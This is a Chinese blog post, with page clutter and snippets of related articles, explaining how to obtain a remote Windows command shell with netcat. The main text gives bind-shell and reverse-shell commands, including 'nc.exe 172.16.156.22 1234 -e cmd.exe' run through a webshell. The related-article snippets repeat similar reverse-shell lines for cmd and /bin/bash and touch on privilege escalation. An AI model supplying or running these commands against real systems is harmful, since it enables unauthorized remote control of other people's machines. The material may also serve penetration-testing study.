使用nc获取cmdshell

最新推荐文章于 2024-07-24 21:24:56 发布

玄瞋

最新推荐文章于 2024-07-24 21:24:56 发布

阅读量1.2k

点赞数

本文链接：https://blog.csdn.net/Liuhuaijin/article/details/77969261

版权

NetCat简称nc

正向连接的方式就是在目标主机上绑定一个端口，当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理，从而客户端获取一个类型命令提示符的执行环境

执行命令：

CMD路径：c:\windows\system32\cmd.exe

1.语句：\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe

2.客户端直接使用telnet连接就可获得一个cmdshell权限：Telnet 172.16.156.77

反向连接的方式是客户端主动开启一个端口等待目标主机来连接，连接成功后将客户端要执行的命令转交给目标的cmd.exe来处理

1.本地执行：c:\nc -vv -l -p 12345 //监听端口

2.webshell执行：

CMD路径：c:\windows\system32\cmd.exe

语句：\c D:\wwwroot\case1\nc.exe 172.16.156.22 1234 -e cmd.exe //本地ip

3.监听方获取一个反向连接过来的cmdshell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

玄瞋

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

nc传shell抓包-nc连接获取shell

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

09-14

1009

nc传shell步骤1、渗透过程中免不了获取shell，可以通过nc工具连接，当然还有其他很多的工具，只不过nc默认安装在linux中，比较方便。 nc正向连接，防火墙不阻挡外来流量：客户端：nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口服务端：nc -lvvp 4444 #监听4444端口2、nc传shell抓包，nc反向连接，防火墙阻挡外部流量：服务端：nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略

Windows/Linux 下nc 反弹shell

SoulCat

06-11

1万+

*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说：其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的，要来有什么用？ NC概述: nc又名netcat，一个简单而有用的工具，可以干很多事情，但是不可以吃。何为反弹shell？为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...

参与评论您还未登录，请先登录后发表或查看评论

nc 带CMD绑定功能

09-24

nc 不想多说，带CMD绑定功能的 nc 不想多说，带CMD绑定功能的

NC工具—文件传输&shell获取功能

weixin_44431280的博客

04-03

6770

NC工具—文件传输&shell获取功能前言：此文主要对NC（NETCAT）工具的文件传输和SHELL获取功能进行学习记录，不对工具简介和基本功能进行赘述，可参考我的另一篇文章Web安全工具—nc（瑞士军刀）持续更新基础知识： 1，文件传输基础知识：linux下的输入重定向"<“和输出重定向”>"介绍输入重定向： ...

反弹shell的方式——之NC反弹shell

最新发布

aihua002的博客

07-24

458

反弹shell是指在攻击机监听某个端口，然后通过目标连接攻击机监听的端口，在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制，导致无法持续控制目标，或者执行命令受阻等情况时需要进行反弹shell。

linux中nc命令如何获取,linux 使用nc获取cmdshell

weixin_30783205的博客

04-30

320

0x00 NC命令详解在介绍如何反弹shell之前，先了解相关知识要点。nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp-v 参数，详细输出n参数高数netcat不要DNS反向查询IP的域名z参数，连接成功后立即关闭连接$ nc -v 172.31.100.7 21netcat 命令会连接开放端口2...

cmd，nc通信操作

m0_75259178的博客

04-30

432

我这里是来演示nc瑞士军刀同步通信，所以打开两个终端，一个cmd,服务端：nc -nv 127.0.0.1 1234。如果需要远程同行，瑞士军刀目录下，打开cmd。输入通信方的IP和端口号，如下图即可同步通信。输入命令：nc -nv IP地址端口号。和一个在瑞士军刀目录下打开cmd的终端，客户端：输入：nc -lp 1234。

nmap配合nc拿到cmd权限

qq_53947780的博客

07-31

245

第一步:在内网进行nmap扫描 nmap -sn [扫描内网网段] （直接跳过主机发现）第二步:确定目标：nmap -sS 【目标IP】第三步:黑客用nc.exe监听自己端口4444：nc -lp 4444 第四步:服务端主动连接黑客：nc -nv 【黑客IP】 4444 -e cmd (如果是linux为-c bash) 控制cmd后进行信息收集: whoami 查看自己身份 whoami /all 获取当前域的信息 ipconfig /all 查看详细ip...

cmd反弹shell提权

10-24

根据原文描述，作者在面对账号被删除的情况下，尝试了UDF提权方法未果后，转而使用了cmd反弹shell的方式进行提权。具体步骤如下： 1. **环境准备**：作者已经拥有了对目标服务器的低权限访问。 2. **工具准备**：...

cmd echo写入shell_学习笔记-命令执行及花式bypass写shell

weixin_30801745的博客

01-26

1773

命令执行的坑其实早就想填了。最早是因为校赛时，easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽，下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上，而linux的知识主要在RCE达成上。先从简单说起：linux 命令& RCErce,即remote comma...

内网渗透之Windows反弹shell（综合）

墨鱼菜鸡

09-10

1084

目录反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...

NC反弹CMD.EXE

04-20

NC反弹CMD

nc文件的读取作图

01-14

使用MATLAB读取nc文件格式代码，提取数据，完成作图等。

nc文件读取 python语言

09-12

nc文件读取 python语言编写的读取nc文件

批量读取NC格式的TRMM降水数据

08-15

利用Matlab将NC格式的TRMM遥感降水数据进行批量处理，并最终将其按行排列。

nc 命令转发bash

weixin_30247159的博客

09-23

484

反向 1.控制端：nc -lvp 4444 2.被控制端：nc 控制端IP 4444 -e /bin/bash 正向 1.被控制端：nc -lvp 4444 -e /bin/bash 2.控制端：nc被控制端ip 4444 转载于:https://www.cnblogs.com/ahuo/p/11574927.html...

NC反弹CMDSHELL提权总结

weixin_34404393的博客

03-15

569

Server-U等都不可以用的情况下. 一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去 2:然后本地执行nc -vv -lp 52进行反弹 ...

NC文件的查阅,读取和分析(1)